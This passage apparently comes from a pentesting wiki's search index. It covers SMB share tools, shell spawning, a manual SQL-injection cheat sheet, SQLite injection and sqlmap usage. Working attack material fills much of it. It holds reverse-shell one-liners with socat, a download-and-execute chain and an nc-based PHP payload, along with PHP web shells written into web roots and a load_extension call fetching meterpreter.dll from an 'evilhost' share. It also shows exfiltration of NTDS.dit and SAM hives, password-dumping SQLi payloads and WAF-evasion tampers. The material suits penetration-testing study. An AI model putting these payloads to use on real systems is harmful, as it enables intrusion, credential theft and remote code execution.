    # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# # Enumerate network shares and access associated permissions with recursivity\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbserver/","title":"smbserver - from impacket","text":"

    Simple SMB Server example. See impacket.

    ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#installation","title":"Installation","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/smbserver.py

    ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#basic-usage","title":"Basic usage","text":"","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#create-a-share-server-in-attacker-machine-and-connect-from-victims","title":"Create a share server in attacker machine and connect from victim's","text":"

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

    Also you can launch it with username and password:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n

    Now, from PS in the victim's windows machine we could upload a folder to the shared folder in the attacker machine just by running:

    cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

    Sidenote: see the HackTheBox machine Omni, which uses SirepRAT to upload files to the share. A taste of it:

    # First crate the shared. After that, establish the connection:\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n\n# Now copy files to the share. In this case we are dumping Hives \npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\sam \\\n\\10.10.14.2\\CompData\\sam'\n
    ","tags":["pentesting windows","server","impacket"]},{"location":"snmpwalk/","title":"snmpwalk - SNMP scanner","text":"

    See SNMP for details about the protocol.

    Snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#installation","title":"Installation","text":"
    sudo apt-get install snmp\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#basic-usage","title":"Basic usage","text":"
    snmpwalk -v2c -c public $ip\n
    snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
    snmpwalk -v 2c -c private $ip\n

    If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"spawn-a-shell/","title":"Spawn a shell","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

    Webshell is a script written in a language that is executed by a server. Web shell are not fully interactive.

    Resources for upgrading simple shells
    • https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html.
    • Cheat sheet.
    • Shell creation.
    • About webshells.

    Sidenote: Also, you can generate a webshell by using\u00a0 msfvenom

    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#clasification-of-shells","title":"Clasification of shells","text":"

    On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

    There are three main types of shell connections:

    Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shells \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shells Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command.","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#spawn-a-shell_1","title":"Spawn a shell","text":"","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#bash","title":"bash","text":"
    # Upgrade shell with running these commands all at once:\n\nSHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n
    bash -i\n\n# Using echo\necho 'os.system('/bin/bash')'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#python","title":"python","text":"
     # using python for a pseudo terminal\npython -c 'import os; os.system(\"/bin/sh\")'\n
     # using python for a pseudo terminal\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\npython3 -c \"import pty;pty.spawn('/bin/bash')\"\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ssh","title":"ssh","text":"
    /bin/sh -i\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#perl","title":"perl","text":"
    perl -e 'exec \"/bin/sh\";'\n\nperl:\u00a0 exec \"/bin/sh\";\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ruby","title":"ruby","text":"
    ruby:\u00a0 exec \"/bin/sh\";\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#lua","title":"lua","text":"
    lua: os.execute(\u2018/bin/sh\u2019)\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#socat","title":"socat","text":"
    # Listener:\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

    If socat isn\u2019t installed, there exists other options. There are standalone binaries that can be downloaded from this Github repo: https://github.com/andrew-d/static-binaries

    With a command injection vuln, it\u2019s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:

    wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

    On Kali, run:

    socat file:`tty`,raw,echo=0 tcp-listen:4444\n

    and you\u2019ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It\u2019s a full terminal.

    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#stty-options","title":"stty options","text":"
    # In reverse shell\n$ python -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Ctrl-Z\n\n\n# In Kali\n$ stty raw -echo\n$ fg\n
    # In reverse shell\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty size\nstty rows <num> columns <cols>\n\n# In one line:\nreset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#msfvenom","title":"msfvenom","text":"

    You can generate a webshell by using\u00a0 msfvenom

    # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n

    Also msfvenom can use metasploit payloads under \u201ccmd/unix\u201d to generate one-liner bind or reverse shells. List options with:

    msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#awk","title":"awk","text":"
    awk 'BEGIN {system(\"/bin/sh\")}'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#find","title":"find","text":"
    find / -name nameoffile -exec /bin/awk 'BEGIN {system(\"/bin/sh\")}' \\;\n# This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.\n\nfind . -exec /bin/sh \\; -quit\n# This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#vim","title":"VIM","text":"
    vim -c ':!/bin/sh'\n

    VIM escape:

    vim\n:set shell=/bin/sh\n:shell\n
    ","tags":["pentesting","terminal","shells"]},{"location":"sqli-manual-attack/","title":"SQLi Cheat sheet for manual injection","text":"

    Resources

    • See a more detailed explanation about SQL injection.
    • PayloadsAllTheThings Original payloads for different SQL databases.
    OWASP

    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

    ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
    • Generic SQL Injection Payloads
    • Generic Error Based Payloads.
    • Generic Union Select Payloads.
    • SQL time based payloads .
    • SQL Injection Auth Bypass Payloads
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#comment-injection","title":"Comment injection","text":"

    Put a line comment at the end to comment out the rest of the query.

    Valid for MySQL, SQL Server, PostgreSQL, Oracle, SQLite:

    -- comment      // MySQL [Note the space after the double dash]\n--comment       // MSSQL\n--comment       // PostgreSQL\n--comment       // Oracle\n\n\n/*comment*/     // MySQL\n/*comment*/     // MSSQL\n/*comment*/     // PostgreSQL\n\n#comment        // MySQL\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based-testing","title":"Boolean-based testing","text":"","tags":["pentesting"]},{"location":"sqli-manual-attack/#integer-based-parameter-injection","title":"Integer based parameter injection","text":"

    Common in Integer based parameter injection such as:

    URL: https://site.com/user.php?id=1\nSQL query: SELECT * FROM users WHERE id= FUZZ;\n

    Typical payloads for that query:

    # Return true\nAND 1\nAnd true\n\n# Return False\nAND 0\nAnd false\n\n# Return 56 if vulnerable\n1*56\n\n# Return 1 if not vulnerable\n1*56\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#string-based-parameter-injection","title":"String based parameter injection","text":"
    URL: https://site.com/user.php?id=alexis\nSQL query: SELECT * FROM users WHERE name= 'FUZZ';\n

    Typical payloads for that query:

    # Return true\n''\n\"\"\n\n# Return false\n'\n\"\n

    Exploiting single quote ('): In SQL, the single quote is used to delimit string literals. A way to exploit this is in a Login form:

    # SQL query\nSELECT * FROM users WHERE username = '<username>' AND password = '<password>'\n\n# Payload\n' OR '1'='1'; --\n\n# The attacker's injected SQL code ' OR '1'='1'; -- causes the condition '1'='1' to evaluate to true, effectively bypassing the\nauthentication mechanism. Modified query would became\nSELECT * FROM users WHERE username = '' OR '1'='1'; -- ' AND password = '<password>'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#error-based-testing","title":"Error-based testing","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

    Firstly, every DBMS/RDBMS responds to incorrect/erroneous SQL queries with different error messages, so an error response can be use to fingerprint the database:

    A typical error from MS-SQL will look like this:

    Incorrect syntax near [query snippet]\n

    While a typical MySQL error looks more like this:

    You have an error in your SQL syntax. Check the manual that corresponds\nto your MySQL server version for the right syntax to use near [query\nsnippet]\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#union-attack","title":"UNION attack","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/union-select

    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#mysql","title":"MYSQL","text":"
    #########\nMYSQL\n#########\n\n# Access (using null characters)\n' OR '1'='1' %00\n' OR '1'='1' %16\n\n\n\n# 1. Bypass a form      \n1' OR '1'='1';#\n' OR '1'='1';#\n1' OR '1'='1';-- - \n' OR '1'='1';-- -  \n\n\n# 2. Number of columns (UNION attack)\n1' OR '1'='1' order by 1;#\n1' OR '1'='1' order by 2;#\n1' OR '1'='1' order by 3;#\n...\n# Do this until you get an error message and then you will know the number of columns\n# Another method to see the number of columns. \n' OR '1'='1' order by 1;-- -   \n\n# 3. Get which column is being displayed. For instance, when we know we have 6 columns:\n1' OR '1'='1' UNION SELECT 1,2,3,4,5,6;# \n\n# 4. Get names of all databases \n1' OR '1'='1' UNION SELECT null,table_schema,null,null,null,null,null FROM information_schema.tables;#\n# 4. Get names of all databases in SQLite (name and schema of the tables stored in the database).\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n\n# 5. Get names of all tables from the selected database\n1' OR '1'='1' UNION SELECT null,table_name,null,null,null,null FROM information_schema.tables;# \n\n\n# 6. Get the name of all columns of a selected table from a selected database\n1' OR '1'='1' UNION SELECT null,column_name,null,null,null,null FROM information_schema.columns WHERE table_name='users';#\n\n\n# 7. Get the value of a selected column (for instance, password)\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM users;#\n\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM <databaseName.tableName>;#\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqlite","title":"SQLite","text":"
    #########\nSQLite\n#########\n\n# Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version,NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

    Also, once we know which column is injectable, there are some php functions that can provide us some worthy knowing data:

    database()\nuser()\nversion()\nsqlite_version()\n

    Also, interesting payloads for retrieving concatenates values in a UNION based attack:

    ## Extract database names, table names and column names\n\n#Database names\n-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata\n\n#Tables of a database\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]\n\n#Column names\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]\n

    And here an example of how to retrieve them:

    # if injectable columns are number 2, 3 and 4 you can display some info from the system\nunion select 1, database(),user(),version(),5\n\n# Extra bonus\n# You can also load a file from the system with\nunion select 1, load_file(/etc/passwd),3,4,5\n\n# and you can try to write to a file in the server\nunion select 1,'example example',3,4,5 into outfile '/var/www/path/to/file.txt'\nunion select 1,'example example',3,4,5 into outfile '/tmp/file.txt'\n\n# and we can combine that with a reverse shell like\nunion select 1,'<?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?>', 3,4,5 into outfile '/tmp/reverse.php'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqli-blind-attack","title":"SQLi Blind attack","text":"

    Firstly you need to check the application response to different requests (and/or with false true statements). If you can tell true responses from false responses and validate that the application is processing the boolean values, then you can apply this technique. For that purpose the operator AND is more valuable.

    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based","title":"Boolean based","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

    user() returns the name of the user currently using the database. substring() returns a substring of the given argument. It takes three parameters: the input string, the position of the substring and its length.

    Boolean based query:

    ' OR substring(user(), 1, 1) = 'a\n' OR substring(user(), 1, 1) = 'b\n

    More interesting queries:

    # Database version\n1 and substring(version(), 1, 1) = 4--\n\n# Check that second character of the column user_email for user_name admin from table users is greater than the 'c' character  \n1 and substring((SELECT user_email FROM users WHERE user_name = 'admin'),2,1) > 'c'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#time-based","title":"Time based","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/time-based

    Resources

    • OWASP resources

    Vulnerable SQL query:

    SELECT * from users WHERE username = '[username]' AND password = '[password]';\n

    Time base query:

    ' OR SLEEP(5) -- '\n

    Interesting queries:

    1' AND SUBSTRING(user(), 1, 1 = 'r') sleep(0), sleep(10));#\n

    Examples of available wait/timeout functions include:

    • WAITFOR DELAY '0:0:10'\u00a0in SQL Server
    • BENCHMARK()\u00a0and\u00a0sleep(10)\u00a0in MySQL
    • pg_sleep(10)\u00a0in PostgreSQL
    \n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-bypassing-quotation-marks","title":"Extra Bonus: Bypassing quotation marks","text":"

    Sometimes quotation marks get filtered in SQL queries. To bypass that when querying some tablename, maybe we can skip quotation marks by entering tablename directly in HEX values.

    More bypassing tips:

    # Using mingled upper and lowercase\n\n# Using spaces url encoded\n+\n\n# Using comments\n/**/\n/**\n--\n; --\n; /*\n; //\n\n# Example of bypassing webpages that only displays one value at a time\n1'+uNioN/**/sEleCt/**/table_name,2+fROm+information_schema.tables+where+table_schema?'dvwa'+limit+1,1%23&Submit=Submit#\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-gaining-a-reverse-shell-from-sql-injection","title":"Extra Bonus: Gaining a reverse shell from SQL injection","text":"

    Take a wordpress installation that uses a mysql database. If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

    Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

    The DUAL is a special one row, one column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

    '+UNION+SELECT+NULL+FROM+dual--\n

    Oracle syntax requires the use of FROM, but some queries don't requires any table. For these case we use DUAL. Also Oracle doesn't allow the queries that employ information_schema.tables.

    ","tags":["pentesting"]},{"location":"sqlite/","title":"SQLite injections","text":"","tags":["database","relational","database","SQL"]},{"location":"sqlite/#basic-payloads","title":"Basic payloads","text":"
    # Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version,NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

    Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

    # SQLite comments\n--\n/**/\n\n# SQLite version\nselect sqlite_version();\n\n# String based: Extract database structure\nSELECT sql FROM sqlite_schema\n\n# \\Integer or String based: Extract table name\nSELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'\n\n# \\Integer or String based: Extract column name\nSELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'\n\n# For a clean output\nSELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),\"TEXT\",''),\"INTEGER\",''),\"AUTOINCREMENT\",''),\"PRIMARY KEY\",''),\"UNIQUE\",''),\"NUMERIC\",''),\"REAL\",''),\"BLOB\",''),\"NOT NULL\",''),\",\",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'\n\n# Cleaner output\nSELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');\n\n# \\Boolean: Count number of tables\nand (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table\n\n# \\Boolean: Enumerating table name\n\nand (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number\n\n# \\Boolean:  Extract info\nand (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')\n\n# \\Boolean: Extract info (order by)\nCASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END\n\n# \\Boolean: Error based\nAND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END\n\n# \\Time based\nAND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-attach-database","title":"Remote Command Execution using SQLite command - Attach Database","text":"
    ATTACH DATABASE '/var/www/lol.php' AS lol;\nCREATE TABLE lol.pwn (dataz text);\nINSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\");--\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-load_extension","title":"Remote Command Execution using SQLite command - Load_extension","text":"
    UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');--\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#references","title":"References","text":"

    Injecting SQLite database based application - Manish Kishan Tanwar SQLite Error Based Injection for Enumeration

    ","tags":["database","relational","database","SQL"]},{"location":"sqlmap/","title":"sqlmap - A tool for testing SQL injection","text":"","tags":["pentesting"]},{"location":"sqlmap/#get-parameter","title":"GET parameter","text":"
    sqlmap -u \u2018http://victim.site/view.php?id=112\u2019 -p id --technique=U\n# -p: to indicate an injectable parameter \n# --technique=U  //to indicate a UNION based SQL injection technique // E: error based  // \n# -b: banner of the database\n# --tor: to use a proxy to connect to the target URL\n# -v3: to see the payloads that sqlmap is using\n# --flush-session: to refresh sessions\n# --tamper: default tampers are in /usr/share/sqlmap/tamper\n
    ","tags":["pentesting"]},{"location":"sqlmap/#post-parameter","title":"POST parameter","text":"
    sqlmap -u <URL> --data=<POST string> -p parameter [options]\n
    ","tags":["pentesting"]},{"location":"sqlmap/#using-r-file","title":"Using -r file","text":"

    Capture the request with burpsuite and save it to a file.

    # Get all databases\nsqlmap -r nameoffiletoinject --method POST --data \"parameter=lala\" -p parameter --dbs    \n\n# Get all tables \nsqlmap -r nameoffiletoinject --tables\n\n# Get all columns of a given database dwva\nsqlmap -r nameoffiletoinject --current-db dwva -columns\n\n# Get all tables of a given database, for example dwva\nsqlmap -r nameoffiletoinject -D dwva --tables\n\n# Get all columns of a given table in a given database\nsqlmap -r nameoffiletoinject -D dwva -T users --columns\n\n# Dump users table\nsqlmap -r nameoffiletoinject -D dwva -T users --dump\n\n# Get columns username and password of table users from table dwva\nsqlmap -r nameoffiletoinject -D dwva -T users -C username,password --dump\n\n# Automatically attempt to upload a web shell using the vulnerable parameter and execute it\nsqlmap -r nameoffiletoinject -p vuln-param -os-shell \n\n# Alternatively use the os-pwn option to gain a shell using meterpreter or vnc \nsqlmap -r nameoffiletoinject -p vuln-param -os-pwn \n
    ","tags":["pentesting"]},{"location":"sqlmap/#using-url","title":"Using URL","text":"

    You can also provide the url with --url or -u

    sqlmap --url \u2018http://victim.site\u2019  --dbs --batch //\nsqlmap --url \u2018http://victim.site\u2019  --users // gets users\nsqlmap --url \u2018http://victim.site\u2019  --tables // gets all tables\nsqlmap --url \u2018http://victim.site\u2019  --batch //\n\n\n# Check what users we have and which privileges that user has.\nsqlmap -u $IP/path.php --forms --cookie=\"PHPSESSID=v5098os3cdua2ps0nn4ueuvuq6\" --batch --users\n\n# Dump the password hash for an user (postgres in the example) and exploit that super permission.\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" -U postgres --password --batch\n\n# Get a shell \nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" --batch --os-shell                  \n
    ","tags":["pentesting"]},{"location":"sqlmap/#getting-a-direct-sql-shell","title":"Getting a direct SQL Shell","text":"
    # Get a OS shell\nsqlmap --url \u2018http://victim.site\u2019  --os-shell\n\n# GEt a SQL shell\nsqlmap --url \u2018http://victim.site\u2019  --sql-shell\n
    ","tags":["pentesting"]},{"location":"sqlmap/#suffixes-and-preffixes","title":"Suffixes and preffixes","text":"","tags":["pentesting"]},{"location":"sqlmap/#set-a-suffix","title":"Set a suffix","text":"
    sqlmap -u \"http://example.com/?id=1\"  -p id --suffix=\"-- \"\n
    ","tags":["pentesting"]},{"location":"sqlmap/#prefix","title":"Prefix","text":"
    sqlmap -u \"http://example.com/?id=1\"  -p id --prefix=\"') \"\n
    ","tags":["pentesting"]},{"location":"sqlmap/#injections-in-headers-and-other-http-methods","title":"Injections in Headers and other HTTP Methods","text":"
    #Inside cookie\nsqlmap  -u \"http://example.com\" --cookie \"mycookies=*\"\n\n#Inside some header\nsqlmap -u \"http://example.com\" --headers=\"x-forwarded-for:127.0.0.1*\"\nsqlmap -u \"http://example.com\" --headers=\"referer:*\"\n\n#PUT Method\nsqlmap --method=PUT -u \"http://example.com\" --headers=\"referer:*\"\n\n#The injection is located at the '*'\n
    ","tags":["pentesting"]},{"location":"sqlmap/#tampers","title":"Tampers","text":"
    sqlmap -r request.txt --tamper=space2comment\n# space2comment: changes whitespace to /**/\n
    Tamper Description apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart appendnullbyte.py Appends encoded NULL byte character at the end of payload base64encode.py Base64 all characters in a given payload between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' charencode.py Url-encodes all characters in a given payload (not processing already encoded) charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"%u0022\" charunicodeescape.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"\\u0022\" equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' escapequotes.py Slash escape quotes (' and \") greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' modsecurityversioned.py Embraces complete query with versioned comment modsecurityzeroversioned.py Embraces complete query with zero-versioned comment multiplespaces.py Adds multiple spaces around SQL keywords nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(\"SELECT\", \"\")) filters percentage.py Adds a percentage sign ('%') infront of each character overlongutf8.py Converts all characters in a given payload (not processing already encoded) randomcase.py Replaces each keyword character with random case value randomcomments.py Add random comments to SQL keywords securesphere.py Appends special crafted string sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs space2comment.py Replaces space character (' ') with comments space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\\n') space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\\n') space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\\n') space2plus.py Replaces space character (' ') with plus ('+') space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) uppercase.py Replaces each keyword character with upper case value 'INSERT' varnish.py Append a HTTP header 'X-originating-IP' versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment versionedmorekeywords.py Encloses each keyword with 